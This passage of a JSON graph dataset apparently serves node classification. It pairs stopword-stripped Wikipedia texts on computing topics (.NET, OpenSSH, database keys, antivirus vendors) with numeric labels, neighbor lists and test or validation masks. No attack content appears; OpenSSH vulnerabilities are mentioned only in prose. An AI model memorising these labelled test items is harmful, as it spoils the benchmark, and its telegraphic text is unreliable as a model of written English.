2.0 sp2 3.0 sp2 adds methods properties bcl classes version 2.0 required version 3.5 features language integrated query linq changes affect applications written version 2.0 however previous versions new .net compact framework 3.5 released tandem update order provide support additional features windows mobile windows embedded ce devices source code framework class library version partially released debugging reference microsoft reference source license .net framework 3.5 supported windows xp server 2003 vista server 2008 7 server 2008 r2 8 server 2012 8.1 server 2012 r2 10 server 2016 .net framework 3.5 service pack 1 released 11 august 2008 release adds new functionality provides performance improvements certain conditions especially wpf 20–45 improvements expected two new data service components added ado.net entity framework ado.net data services two new assemblies web development system.webabstraction system.webrouting added used asp.net mvc framework reportedly used future release asp.net forms applications service pack 1 included sql server 2008 visual studio 2008 service pack 1 also featured new set controls called visual basic power packs brought back visual basic controls line shape version 3.5 sp1 .net framework shipped windows 7 also shipped windows server 2008 r2 optional component disabled default .net framework 3.5 sp1 also new variant .net framework called .net framework client profile 28 mb significantly smaller full framework installs components relevant desktop applications however client profile amounts size using online installer windows xp sp2 .net frameworks installed using windows update using off-line installer os download size still 250 mb key focuses release .net framework 4.0 supported windows xp service pack 3 windows server 2003 vista server 2008 7 server 2008 r2 applications utilizing .net framework 4.0 also run computers .net framework 4.5 4.6 installed supports additional operating systems .net framework 4.0 last version support windows xp windows server 2003 microsoft announced intention ship .net framework 4 29 september 2008 public beta released 20 may 2009 28 july 2009 second release .net framework 4 beta made available experimental software transactional memory support functionality available final version framework 19 october 2009 microsoft released beta 2 .net framework 4 time microsoft announced expected launch date .net framework 4 22 march 2010 launch date subsequently delayed 12 april 2010 10 february 2010 release candidate published version rc 12 april 2010 final version .net framework 4.0 launched alongside final release microsoft visual studio 2010 18 april 2011 version 4.0.1 released supporting customer-demanded fixes windows workflow foundation design-time component requires visual studio 2010 sp1 adds workflow state machine designer 19 october 2011 version 4.0.2 released supporting new features microsoft sql server version 4.0.3 released 4 march 2012 release .net framework 4 microsoft released set enhancements named windows server appfabric application server capabilities form appfabric hosting in-memory distributed caching support .net framework 4.5 released 15 august 2012 set new improved features added version .net framework 4.5 supported windows vista later .net framework 4.5 uses common language runtime 4.0 additional runtime features .net framework 4.5 supported windows vista server 2008 7 server 2008 r2 8 server 2012 8.1 server 2012 r2 applications utilizing .net framework 4.5 also run computers .net framework 4.6 installed supports additional operating systems metro-style apps originally designed specific form factors leverage power windows operating system two subset .net framework available building metro-style apps using c visual basic one windows 8 windows 8.1 called .net apis windows 8.x store apps another universal windows platform uwp called .net apis uwp version .net framework well runtime libraries used metro-style apps part windows runtime new platform development model metro-style apps ecosystem houses many platforms languages including .net framework c++ html5 javascript managed extensibility framework mef library creating lightweight extensible applications allows application developers discover use extensions configuration required also lets extension developers easily encapsulate code avoid fragile hard dependencies mef allows extensions reused within applications across applications well release .net framework 4.5.1 announced 17 october 2013 along visual studio 2013 version requires windows vista sp2 later included windows 8.1 windows server 2012 r2 new features .net framework 4.5.1 release .net framework 4.5.2 announced 5 may 2014 version requires windows vista sp2 later windows forms applications improvements made high dpi scenarios asp.net higher reliability http header inspection modification methods available new way schedule background asynchronous worker tasks .net framework 4.6 announced 12 november 2014 released 20 july 2015 supports new just-in-time compiler jit 64-bit systems called ryujit features higher performance support sse2 avx2 instruction sets wpf windows forms received updates high dpi scenarios support tls 1.1 tls 1.2 added wcf version requires windows vista sp2 later cryptographic api .net framework 4.6 uses latest version windows cng cryptography api result nsa suite b cryptography available .net framework suite b consists aes sha-2 family hashing algorithms elliptic curve diffie–hellman elliptic curve dsa .net framework 4.6 supported windows vista server 2008 7 server 2008 r2 8 server 2012 8.1 server 2012 r2 10 server 2016 however .net framework 4.6.1 4.6.2 drops support windows vista server 2008 .net framework 4.6.2 drops support windows 8 release .net framework 4.6.1 announced 30 november 2015 version requires windows 7 sp1 later new features apis include preview .net framework 4.6.2 announced march 30 2016 released august 2 2016 version requires windows 7 sp1 later new features include 5 april 2017 microsoft announced .net framework 4.7 integrated windows 10 creators update promising standalone installer windows versions update visual studio 2017 released date add support targeting .net framework 4.7 promised standalone installer windows 7 later released 2 may 2017 prerequisites included package new features .net framework 4.7 include .net framework 4.7 supported windows 7 server 2008 r2 server 2012 8.1 server 2012 r2 10 server 2016 server 2019 .net framework 4.7.1 released 17 october 2017 amongst fixes new features corrects d3dcompiler dependency issue also adds compatibility .net standard 2.0 box .net framework 4.7.2 released 30 april 2018 amongst changes improvements asp.net bcl clr clickonce networking sql wcf windows forms workflow wpf version included server 2019 .net framework 4.8 released 18 april 2019 includes additional enhancements high-resolution displays performance updates security enhancements .net framework 4.8 supported windows 7 server 2008 r2 server 2012 8.1 server 2012 r2 10 server 2016 server 2019 most-recent release 4.8.0 build 3928 released july 25 2019 offline installer size 111mb digital signature date july 25 2019",
    "neighbors": [
      10624,
      3076,
      9348,
      3462,
      4231,
      1802,
      6411,
      11283,
      11030,
      3224,
      3736,
      4505,
      5403,
      3997,
      3102,
      4384,
      8609,
      10145,
      8227,
      10020,
      11559,
      3496,
      3881,
      2603,
      9263,
      3250,
      3894,
      321,
      65,
      1347,
      1348,
      4174,
      847,
      5844,
      9434,
      731,
      4316,
      1501,
      5470,
      7134,
      2145,
      10340,
      1382,
      4198,
      4074,
      363,
      9834,
      3821,
      3573,
      4853,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 10625,
    "label": 7,
    "text": "Job_Submission_Description_Language:job submission description language job submission description language extensible xml specification global grid forum description simple tasks non-interactive computer execution systems currently version 1.0 released november 7 2005 specification focuses description computational task submissions traditional high-performance computer systems like batch schedulers jsdl describes submission aspects job attempt describe state running historic jobs instead jsdl includes descriptions following software known currently support jsdl",
    "neighbors": [
      5414,
      198,
      8702,
      479,
      8030,
      7935,
      8339,
      11353,
      222,
      7615
    ],
    "mask": "None"
  },
  {
    "node_id": 10626,
    "label": 5,
    "text": "V5_interface:v5 interface v5 family telephone network protocols defined etsi allow communications telephone exchange also known specifications local exchange le local loop potentially thousands subscribers connected le problem physically managing thousands wires local subscribers costs associated prior specification v5 manufacturers exchange equipment proprietary solutions problem solutions inter-operate meant tied single manufacturer method exchange v5 provided standard set protocols subscriber le access network defined reference point signalling point le standardised therefore allowed multiple vendor solution provided specifications followed resulted single link case v5.2 multiple links le reducing need many lines along point likely need proprietary solution manage single link final link local loop remained digital signalling isdn analogue signalling basic telephony also known pots industry protocols based principle common-channel signaling message-based signalling subscribers uses signalling channel rather separate channels existing different subscribers v5 comes two forms v5.1 supports control pstn isdn protocols v5.2 also supports bcc link control protection protocols v5 layer 3 protocols transported layer 2 protocol called lapv5 variation lap-d link access procedures channel isdn transport layer v5 protocol stack controls circuit-switched communication paths portions v5 re-used new service known narrowband multimedia delivery service nmds particular pstn protocol re-used combined isdn provide service subscriber allowed digital connection subscribers house re-use analogue phones across digital connection reference point replaced isdn-like nte nte managed analogue service basic rate isdn service subscribers home",
    "neighbors": [
      6068,
      3156,
      5029
    ],
    "mask": "Test"
  },
  {
    "node_id": 10627,
    "label": 2,
    "text": "Novell_S-Net:novell s-net s-net aka sharenet network operating system set network protocols used talk client machines network released novell 1983 s-net operating system entirely proprietary operating system written motorola 68000 processor used star network topology s-net also called netware 68 68 denoting 68000 processor superseded netware 86 written intel 8086 processor 1985",
    "neighbors": [
      7269,
      7983,
      11184,
      6675,
      3007
    ],
    "mask": "None"
  },
  {
    "node_id": 10628,
    "label": 1,
    "text": "Primary_key:primary key relational model databases primary key specific choice minimal set attributes columns uniquely specify tuple row relation table informally primary key attributes identify record simple cases simply single attribute unique id formally primary key choice candidate key minimal superkey candidate key alternate key primary key may consist real-world observables case called natural key attribute created function key used identification outside database called surrogate key example database people given nationality time location birth could natural key.national identification number another example attribute may used natural key although mainly used today relational database context term primary key pre-dates relational model also used database models relational database terms primary key differ form function key n't primary practice various different motivations may determine choice one key primary another designation primary key may indicate preferred identifier data table primary key used foreign key references tables may indicate technical rather semantic feature table languages software special syntax features used identify primary key e.g primary key constraint sql relational model expressed relational calculus relational algebra distinguish primary keys kinds keys primary keys added sql standard mainly convenience application programmer primary keys defined iso sql standard primary key constraint syntax add constraint existing table defined like primary key also specified directly table creation sql standard primary keys may consist one multiple columns column participating primary key implicitly defined null note rdbms require explicitly marking primary key columns codice_1 primary key consists single column column marked using following syntax circumstances natural key uniquely identifies tuple relation may cumbersome use software development example may involve multiple columns large text fields cases surrogate key used instead primary key situations may one candidate key relation candidate key obviously preferred surrogate key may used primary key avoid giving one candidate key artificial primacy others since primary keys exist primarily convenience programmer surrogate primary keys often used many cases exclusively database application design due popularity surrogate primary keys many developers cases even theoreticians come regard surrogate primary keys inalienable part relational data model largely due migration principles object-oriented programming model relational model creating hybrid object-relational model orm like active record pattern additional restrictions placed primary keys however neither restrictions part relational model sql standard due diligence applied deciding immutability primary key values database application design database systems even imply values primary key columns changed using codice_2 sql statement typically one candidate key chosen primary key candidate keys become alternate keys may unique index assigned order prevent duplicates duplicate entry valid unique column alternate keys may used like primary key single-table select filtering clause typically used join multiple tables",
    "neighbors": [
      8195,
      3591,
      10632,
      7053,
      2068,
      11674,
      8230,
      7080,
      2217,
      7339,
      10413,
      10292,
      9397,
      3004,
      2369,
      11457,
      9286,
      2512,
      2901,
      10326,
      2009,
      347,
      2780,
      2026,
      10737,
      9075,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 10629,
    "label": 8,
    "text": "PeerIndex:peerindex peerindex london-based company providing social media analytics based footprints use major social media services currently facebook linkedin quora twitter part emerging group social media analytics providers peerindex helps social media contributors assess score influence benefit social capital built peerindex currently tracks approximately 45 million twitter profiles making company one leaders sector peerindex founded 2009 azeem azhar former journalist reuters executive ditlev schwanenflügel former mckinsey consultant bill emmott former editor-in-chief economist backed number internet investors peerindex measures influence measuring activity audience authority metrics chosen maximize relevance insight minimizing vulnerability gaming spambots noise authority measures relevant activity community authority measure boosted whenever others like comment and/or engage activity audience measures reach relative rest population activity measures activity compared rest population",
    "neighbors": [
      5461,
      735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10630,
    "label": 9,
    "text": "Lisp_reader:lisp reader programming language lisp reader codice_1 function parser converts textual form lisp objects corresponding internal object structure original lisp s-expressions consisted symbols integers list constructors codice_2 codice_3 later lisps culminating common lisp added literals floating-point complex rational numbers strings constructors vectors reader responsible parsing list structure interning symbols converting numbers internal form calling read macros reader controlled codice_4 defines meaning character unlike programming languages lisp supports parse-time execution programs called read macros reader macros used extend syntax either universal program-specific ways example quoted form codice_5 operator abbreviated codice_6 codice_7 operator defined read macro reads following list wraps codice_8 similarly backquote operator defined read macro",
    "neighbors": [
      11488,
      6502,
      5031,
      2056,
      2062,
      4799
    ],
    "mask": "Test"
  },
  {
    "node_id": 10631,
    "label": 2,
    "text": "OpenSSH:openssh openssh also known openbsd secure shell suite secure networking utilities based secure shell ssh protocol provides secure channel unsecured network client–server architecture openssh started fork free ssh program developed tatu ylönen later versions ylönen ssh proprietary software offered ssh communications security openssh first released 1999 currently developed part openbsd operating system openssh single computer program rather suite programs serve alternatives unencrypted protocols like telnet ftp openssh integrated several operating systems portable version available package systems openssh created openbsd developers alternative original ssh software tatu ylönen proprietary software although source code available original ssh various restrictions imposed use distribution openssh created fork björn grönvall ossh fork tatu ylönen original free ssh 1.2.12 release last one license suitable forking openssh developers claim application secure original due policy producing clean audited code released bsd license open source license word open name refers openssh first appeared openbsd 2.6 first portable release made october 1999 developments since included addition ciphers e.g. chacha20-poly1305 6.5 january 2014 cutting dependency openssl 6.7 october 2014 extension facilitate public key discovery rotation trusted hosts transition dsa ed25519 public host keys version 6.8 march 2015 19 october 2015 microsoft announced openssh natively supported microsoft windows accessible powershell releasing early implementation making code publicly available openssh-based client server programs included windows 10 since version 1803 ssh client key agent enabled available default ssh server optional feature-on-demand openssh developed part openbsd operating system rather including changes operating systems directly openssh separate portability infrastructure maintained openssh portability team portable releases made periodically infrastructure substantial partly openssh required perform authentication capability many varying implementations model also used openbsd projects openntpd openssh suite includes following command-line utilities daemons openssh server authenticate users using standard methods supported ssh protocol password public-key authentication using per-user keys host-based authentication secure version host trust relationships using public keys keyboard-interactive generic challenge-response mechanism often used simple password authentication also make use stronger authenticators tokens kerberos/gssapi server makes use authentication methods native host operating system include using bsd authentication system pluggable authentication modules pam enable additional authentication methods one-time passwords however occasionally side-effects using pam openssh must run root root privileges typically required operate pam openssh versions 3.7 16 september 2003 allow pam disabled run-time regular users run sshd instances openbsd openssh uses dedicated user default drop privileges perform privilege separation accordance principle least privilege applied throughout operating system including xenocara x server openssh includes ability set secured channel data sent local client-side unix domain sockets local client-side tcp ports may forwarded sent across secured channel routing server side forwarding set server instructed send forwarded data socket tcp host/port host could server localhost host may computer appears computer server originator data forwarding data bidirectional meaning return communication forwarded back client-side manner known ssh tunnel used multiplex additional tcp connections single ssh connection since 2004 conceal connections encrypt protocols otherwise unsecured circumvent firewalls sending/receiving manner data one port allowed firewall example x window system tunnel may created automatically using openssh connect remote host protocols http vnc may forwarded easily tunneling tcp- encapsulating payload ppp tcp-based connection ssh port forwarding known tcp-over-tcp induce dramatic loss transmission performance problem known tcp meltdown virtual private network software may instead use tunnel connection protocol simpler tcp however often problem using openssh port forwarding many use cases entail tcp-over-tcp tunneling meltdown avoided openssh client processes local client-side tcp connection order get actual payload sent sends payload directly tunnel tcp connection server side openssh server similarly unwraps payload order wrap routing final destination addition third-party software includes support tunnelling ssh include distcc cvs rsync fetchmail operating systems remote file systems mounted ssh using tools sshfs using fuse ad hoc socks proxy server may created using openssh allows flexible proxying possible ordinary port forwarding beginning version 4.3 openssh implements osi layer 2/3 tun-based vpn flexible openssh tunnelling capabilities allowing applications transparently access remote network resources without modifications make use socks case using default configuration attacker success probability recovering 14 bits plaintext 2 openssh 5.2 release modified behavior openssh server mitigate vulnerability privilege escalation vulnerability existed openssh 6.8 6.9 cve-2015-6565 due world-writable 622 tty devices believed denial service vulnerability use tiocsti ioctl possible inject characters users terminals execute arbitrary commands linux malicious compromised openssh servers could steal private login keys systems using vulnerability relies undocumented connection-resuming feature openssh client called roaming enabled default client supported openssh server applies versions 5.4 released 8 march 2010 7.1 openssh client fixed openssh 7.1p2 released 14 january 2016 cve numbers associated vulnerability cve-2016-0777 information leak cve-2016-0778 buffer overflow february 2001 tatu ylönen chairman cto ssh communications security informed openssh development mailing list company intended assert ownership ssh secure shell trademarks sought change references protocol secsh secsh order maintain control ssh name proposed openssh change name order avoid lawsuit suggestion developers resisted openssh developer damien miller replied urging ylönen reconsider arguing ssh since long generic trademark time ssh secure shell ssh appeared documents proposing protocol open standard hypothesised without marking within proposal registered trademarks ylönen relinquishing exclusive rights name means describing protocol improper use trademark allowing others use trademark incorrectly results trademark becoming generic term like kleenex aspirin opens mark use others study uspto trademark database many online pundits opined term ssh trademarked merely logo using lower case letters ssh addition six years company creation time began defend trademark openssh receiving threats legal repercussions weighed trademark validity developers openssh ylönen members ietf working group developing new standard several meetings group denied ylönen request rename protocol citing concerns would set bad precedent trademark claims ietf participants argued secure shell ssh generic terms could trademarks",
    "neighbors": [
      2050,
      4100,
      3590,
      9223,
      2568,
      11,
      3602,
      6674,
      8725,
      7702,
      8729,
      546,
      2083,
      9762,
      9764,
      6702,
      10801,
      9780,
      4663,
      9281,
      7238,
      8266,
      8778,
      1101,
      4174,
      10831,
      10835,
      7252,
      8283,
      10850,
      10851,
      1637,
      9318,
      10341,
      9320,
      5230,
      1647,
      9839,
      7794,
      9844,
      5749,
      8834,
      1668,
      6281,
      4746,
      8331,
      1164,
      6797,
      10889,
      4248,
      11418,
      2717,
      7325,
      161,
      4771,
      8867,
      10405,
      7847,
      4268,
      10924,
      2222,
      7859,
      2228,
      700,
      4797,
      7356,
      10428,
      7364,
      2245,
      9924,
      6344,
      1741,
      8909,
      1235,
      1750,
      728,
      9946,
      10971,
      6888,
      9451,
      8432,
      4850,
      7411,
      1785,
      8954,
      251,
      6396,
      11001,
      260,
      2825,
      5899,
      7435,
      5391,
      3856,
      1297,
      274,
      1810,
      5405,
      808,
      7983,
      2864,
      9520,
      10033,
      3382,
      8504,
      5433,
      5437,
      7486,
      8517,
      3914,
      3404,
      8012,
      8014,
      11086,
      11088,
      5970,
      11606,
      3422,
      11112,
      5482,
      6506,
      6519,
      3959,
      10105,
      3969,
      3970,
      3465,
      1932,
      3487,
      4001,
      1456,
      7088,
      10161,
      1978,
      960,
      8640,
      9667,
      1993,
      6602,
      6098,
      8147,
      9690,
      10202,
      5084,
      7139,
      4071,
      10727,
      5612,
      9709,
      2545,
      11249,
      8692,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10632,
    "label": 1,
    "text": "Foreign_key:foreign key context relational databases foreign key set attributes subject certain kind inclusion dependency constraint specifically constraint tuples consisting foreign key attributes one relation r must also exist necessarily distinct relation furthermore attributes must also candidate key s. simpler words foreign key set attributes references candidate key example table called team may attribute member_name foreign key referencing candidate key employee_name employee table since member_name foreign key value existing name member team must also exist employee name employee table table containing foreign key called child table table containing candidate key called referenced parent table database relational modeling implementation candidate key set zero attributes values guaranteed unique tuple row relation value combination values candidate key attributes tuple duplicated tuple relation since purpose foreign key identify particular row referenced table generally required foreign key equal candidate key row primary table else value null value. rule called referential integrity constraint two tables violations constraints source many database problems database management systems provide mechanisms ensure every non-null foreign key corresponds row referenced table example consider database two tables customer table includes customer data order table includes customer orders suppose business requires order must refer single customer reflect database foreign key column added order table e.g. customerid references primary key customer e.g id primary key table must unique customerid contains values primary key field may assume value customerid identify particular customer placed order however longer assumed order table kept date rows customer table deleted id column altered working tables may become difficult many real world databases work around problem 'inactivating rather physically deleting master table foreign keys complex update programs modify references foreign key change needed foreign keys play essential role database design one important part database design making sure relationships real-world entities reflected database references using foreign keys refer one table another another important part database design database normalization tables broken apart foreign keys make possible reconstructed multiple rows referencing child table may refer row referenced parent table case relationship two tables called one many relationship referenced table referencing table addition child parent table may fact table i.e foreign key refers back table foreign key known self-referencing recursive foreign key database management systems often accomplished linking first second reference table table may multiple foreign keys foreign key different parent table foreign key enforced independently database system therefore cascading relationships tables established using foreign keys likewise foreign keys defined part codice_1 sql statement foreign key single column column marked using following syntax foreign keys defined stored procedure statement database management system enforces referential constraints must ensure data integrity rows referenced table deleted updated dependent rows referencing tables still exist references considered specifies 5 different referential actions shall take place occurrences whenever rows master referenced table deleted updated respective rows child referencing table matching foreign key column deleted updated well called cascade delete update value updated deleted row exists referencing child table references value referenced table similarly row deleted long reference referencing child table understand restrict cascade better may helpful notice following difference might immediately clear referential action cascade modifies behavior child table word cascade used example delete cascade effectively says referenced row deleted table master table delete also however referential action restrict modifies behavior master table child table although word restrict appears child table master table delete restrict effectively says someone tries delete row table master table prevent deletion table course also n't delete main point restrict supported microsoft sql 2012 earlier action restrict much alike main difference action restrict action referential integrity check done trying alter table restrict check trying execute update delete statement referential actions act referential integrity check fails update delete statement result error words update delete statement executed referenced table using referential action action dbms verifies end statement execution none referential relationships violated different restrict assumes outset operation violate constraint using action triggers semantics statement may yield end state foreign key relationships violated time constraint finally checked thus allowing statement complete successfully general action taken dbms set null set default delete update value affected referencing attributes changed null set null specified default value set default referential actions generally implemented implied triggers i.e triggers system-generated names often hidden subject limitations user-defined triggers order execution relative triggers may need considered cases may become necessary replace referential action equivalent user-defined trigger ensure proper execution order work around mutating-table limitations another important limitation appears transaction isolation changes row may able fully cascade row referenced data transaction see therefore cascade onto example transaction attempting renumber customer account simultaneous transaction attempting create new invoice customer cascade rule may fix invoice rows transaction see keep consistent renumbered customer row wo n't reach another transaction fix data database guarantee consistent data two transactions commit one forced roll back often first-come-first-served basis first example illustrate foreign keys suppose accounts database table invoices invoice associated particular supplier supplier details name address kept separate table supplier given 'supplier number identify invoice record attribute containing supplier number invoice 'supplier number primary key supplier table foreign key invoices table points primary key relational schema following primary keys marked bold foreign keys marked italics corresponding data definition language statement follows",
    "neighbors": [
      8195,
      3591,
      8201,
      2068,
      1049,
      5658,
      9248,
      10793,
      10286,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      8291,
      9828,
      10340,
      8808,
      2669,
      1146,
      3196,
      6782,
      10389,
      4255,
      4263,
      8871,
      10413,
      9397,
      7868,
      6850,
      2246,
      8393,
      2780,
      734,
      10471,
      6383,
      7412,
      6395,
      8979,
      7446,
      11030,
      5403,
      9503,
      2344,
      9010,
      1341,
      4416,
      2369,
      5953,
      10048,
      9041,
      7506,
      2901,
      10069,
      347,
      8539,
      7022,
      9075,
      10628,
      7053,
      2456,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      3004,
      6101,
      987,
      4065,
      7654,
      6124,
      2544,
      10737
    ],
    "mask": "None"
  },
  {
    "node_id": 10633,
    "label": 4,
    "text": "Syhunt:syhunt syhunt world wide web network security software company headquarters rio de janeiro brazil syhunt founded august 2003 felipe daragon network security specialist company operations currently centered development software relating assessment web servers web applications 2003 syhunt released web application security assessment software known sandcat focuses open web application security project owasp sans institute vulnerabilities syhunt also produced number security software utilities including worm removal tools worm outbreaks server hardening log analysis tools today company still engaged development web application security assessment software also participates common vulnerabilities exposures cve initiative",
    "neighbors": [
      10437,
      939,
      9293,
      2739,
      2709,
      5404
    ],
    "mask": "Test"
  },
  {
    "node_id": 10634,
    "label": 0,
    "text": "Referring_expression_generation:referring expression generation referring expression generation reg subtask natural language generation nlg received scholarly attention nlg concerned conversion non-linguistic information natural language reg focuses creation referring expressions noun phrases identify specific entities called targets task split two sections content selection part determines set properties distinguish intended target linguistic realization part defines properties translated natural language variety algorithms developed nlg community generate different types referring expressions referring expression linguistics noun phrase surrogate noun phrase whose function discourse identify individual object thing event ... technical terminology identify differs great deal one school linguistics another widespread term probably refer thing identified referent example work john lyons linguistics study reference relations belongs pragmatics study language use though also matter great interest philosophers especially wishing understand nature knowledge perception cognition generally various devices used reference determiners pronouns proper names ... reference relations different kinds referents real imaginary world discourse may singular plural collective simplest type referring expressions pronoun linguistics natural language processing communities developed various models predicting anaphor referents centering theory ideally referring-expression generation would based models however nlg systems use much simpler algorithms example using pronoun referent mentioned previous sentence sentential clause entity gender mentioned sentence considerable amount research generating definite noun phrases big red book much builds model proposed dale reiter extended various ways example krahmer et al present graph-theoretic model definite np generation many nice properties recent years shared-task event compared different algorithms definite np generation using tuna corpus recently research generating referring expressions time space references tend imprecise exact meaning tonight also interpreted different ways different people hence may necessary explicitly reason false positive vs false negative tradeoffs even calculate utility different possible referring expressions particular task context ideally good referring expression satisfy number criteria reg goes back early days nlg one first approaches done winograd 1972 developed incremental reg algorithm shrdlu program afterwards researchers started model human abilities create referring expressions 1980s new approach topic influenced researchers appelt kronfeld created programs kamp bertrand considered referring expressions parts bigger speech acts interesting findings fact referring expressions used add information beyond identification referent well influence communicative context gricean maxims referring expressions furthermore skepticism concerning naturalness minimal descriptions made appelt kronfeld research foundation later work reg search simple well-defined problems changed direction research early 1990s new approach led dale reiter stressed identification referent central goal like appelt discuss connection gricean maxims referring expressions culminant paper also propose formal problem definition furthermore reiter dale discuss full brevity greedy heuristics algorithms well incremental algorithm ia became one important algorithms reg 2000 research began lift simplifying assumptions made early reg research order create simple algorithms different research groups concentrated different limitations creating several expanded algorithms often extend ia single perspective example relation many simplifying assumptions still place begun worked also combination different extensions yet done called non-trivial enterprise krahmer van deemter another important change 2000 increasing use empirical studies order evaluate algorithms development took place due emergence transparent corpora although still discussions best evaluation metrics use experimental evaluation already led better comparability algorithms discussion goals reg task-oriented research furthermore research extended range related topics choice knowledge representation kr frameworks area main question kr framework suitable use reg remains open answer question depends well descriptions expressed found lot potential kr frameworks left unused far different approaches usage dale reiter 1995 think referring expressions distinguishing descriptions define entity domain characterised set attribute-value pairs example formula_1type dogformula_2 formula_1gender femaleformula_2 formula_1age 10 yearsformula_2 problem defined follows let formula_7 intended referent formula_8 contrast set set formula_9 attribute–value pairs represent distinguishing description following two conditions hold words generate referring expression one looking set properties apply referent distractors problem could easily solved conjoining properties referent often leads long descriptions violating second gricean maxim quantity another approach would find shortest distinguishing description like full brevity algorithm yet practice common instead include condition referring expressions produced algorithm similar human-produced ones possible although often explicitly mentioned full brevity algorithm always finds minimal distinguishing description meaning shorter distinguishing description regard properties used therefore iterates formula_24 checks every description length formula_25 properties distinguishing description found two problems arise way creating referring expressions firstly algorithm high complexity meaning np-hard makes impractical use secondly human speakers produce descriptions minimal many situations greedy heuristics algorithm approximates full brevity algorithm iteratively adding distinguishing property description distinguishing property means property rules remaining distractors greedy heuristics algorithm efficient full brevity algorithm dale reiter 1995 present following algorithm greedy heuristic let formula_9 set properties realised description let formula_27 set properties known true intended referent formula_7 assume formula_27 non-empty let formula_8 set distractors contrast set initial conditions thus follows order describe intended referent formula_7 respect contrast set formula_8 following incremental algorithm ia dale reiter influential algorithm 2000 based idea preferential order attributes properties speakers go order run incremental algorithm first preference order attributes given algorithm follows order adds properties description rule remaining distractors furthermore dale reiter stress attribute type always included descriptions even rule distractors also type values part subsumption hierarchy including basic level values example pet domain chihuahua subsumed dog dog animal dog defined basic level dog would preferred algorithms chihuahua rule distractors incremental algorithm easy implement also computationally efficient running polynomial time description generated ia contain redundant properties superfluous later added properties creators consider weakness rather making expressions less psycholinguistically implausible following algorithm simplified version dale reiter ’ incremental algorithm krahmer van deemter takes input referent r containing collection domain objects domain-specific ordered list pref preferred attributes notation l description c context set distractors function rulesout returns set objects value different v attribute 2000 evaluation reg systems theoretical nature like one done dale reiter recently empirical studies become popular mostly based assumption generated expressions similar human-produced ones corpus-based evaluation began quite late reg due lack suitable data sets still corpus-based evaluation dominant method moment though also evaluation human judgement first distinction text corpora experimental corpora made text corpora like gnome corpus contain texts kind domains reg used evaluate realization part algorithms content selection part reg hand requires corpus contains properties domain objects well properties used references typically fully semantically transparent created experiments using simple controlled settings experimental corpora separated general-purpose corpora collected another purpose analysed referring expressions dedicated corpora focus specifically referring expressions examples general-purpose corpora pear stories map task corpus coconut corpus bishop corpus drawer corpus tuna corpus count dedicated corpora tuna corpus contains web-collected data two domains furniture people used three shared reg challenges already measure correspondence corpora results reg algorithms several metrics developed measure content selection part dice coefficient masi measuring agreement set-valued items metric used measure overlap properties two descriptions evaluation scores usually averaged references made different human participants corpus also sometimes measure called perfect recall percentage prp accuracy used calculates percentage perfect matches algorithm-produced human-produced reference linguistic realization part reg overlap strings measured using metrics like bleu nist problem occurs string-based metrics example small monkey measured closer small donkey little monkey time consuming way evaluate reg algorithms letting humans judge adequacy clear description fluency description given good clear english generated expression also belz gatt evaluated referring expressions using experimental setup participants get generated description click target extrinsic metrics reading time identification time error rate could evaluated",
    "neighbors": [
      2440,
      7599
    ],
    "mask": "Test"
  },
  {
    "node_id": 10635,
    "label": 3,
    "text": "Lira_512:lira 512 lira 512 also known lira xt ibm pc xt compatible computer made yugoslav serbian company ei niš late 1980s first presented public april 1988 “ kompjuter ‘ 88 ” computer show belgrade soon lira 512 also presented yugoslav computer press separates lira 512 xt compatibles keyboard included case together 3.5 ’ ’ floppy drive made similar appearance original atari st amiga 500 lira two display adapters monochrome hercules compatible color cga compatible active video adapter chosen back-panel switch 40w power adapter also installed case main purpose lira 512 used computer classrooms lira xt tower released year release original lira 512 realized 512 compact case limits hardware expansion address issue especially allow installation hard disk case changed slimline tower time lira xt tower new lira released similar looking slimline tower case lira compatible ibm pc equipped intel 80286 cpu 1mb ram ega compatible video adapter 2x3.5 floppy drives 40mb hard disk serial production lira started december 1989 1990 design lira 386 based intel 80386 cpu ready production",
    "neighbors": [
      9606,
      1515,
      780,
      6859,
      10635,
      6129,
      7665,
      10356
    ],
    "mask": "Test"
  },
  {
    "node_id": 10636,
    "label": 8,
    "text": "Mint_(software):mint software mint server-based web analytics tool tracks traffic trends http referrers search trends developer shaun inman discontinued sales support december 24 2016",
    "neighbors": [
      1943,
      3688,
      6576,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10637,
    "label": 4,
    "text": "Vba32_AntiVirus:vba32 antivirus vba32 virus block ada 32 antivirus software vendor virusblokada personal computers running microsoft windows detects neutralizes computer viruses computer worms trojan horses malware backdoors adware spyware etc real time demand vba32 used one antivirus engines virustotal virusblokada antivirus software vendor established 1997 belarus 2010 discovered stuxnet first malware attacks supervisory control data acquisition scada systems 2009 judit papp assessed vba32 antivirus product could detect 26 percent unknown malware compared 67 percent detected avira antivir premium 8 percent detected microworld escan anti-virus",
    "neighbors": [
      2049,
      7809,
      131,
      3843,
      10756,
      1417,
      6797,
      4374,
      10392,
      1052,
      156,
      2721,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      10166,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      7251,
      10708,
      2005,
      11225,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      9569,
      11622,
      4464,
      9713,
      3955,
      6643,
      2041,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 10638,
    "label": 9,
    "text": "Martin_Richards_(computer_scientist):martin richards computer scientist martin richards born 21 july 1940 british computer scientist known development bcpl programming language part early research portable software ancestor b programming language invented ken thompson early versions unix dennis ritchie turn used basis widely used c programming language richards studied mathematics undergraduate student university cambridge took cambridge diploma computer science phd programming language design implementation senior lecturer university cambridge computer laboratory retirement 2007 addition bcpl richards work includes development tripos portable operating system awarded ieee computer society computer pioneer award 2003 pioneering system software portability programming language bcpl richards fellow st johns college university cambridge",
    "neighbors": [
      1952,
      1349,
      8262,
      8140,
      7983,
      1783,
      6075,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10639,
    "label": 3,
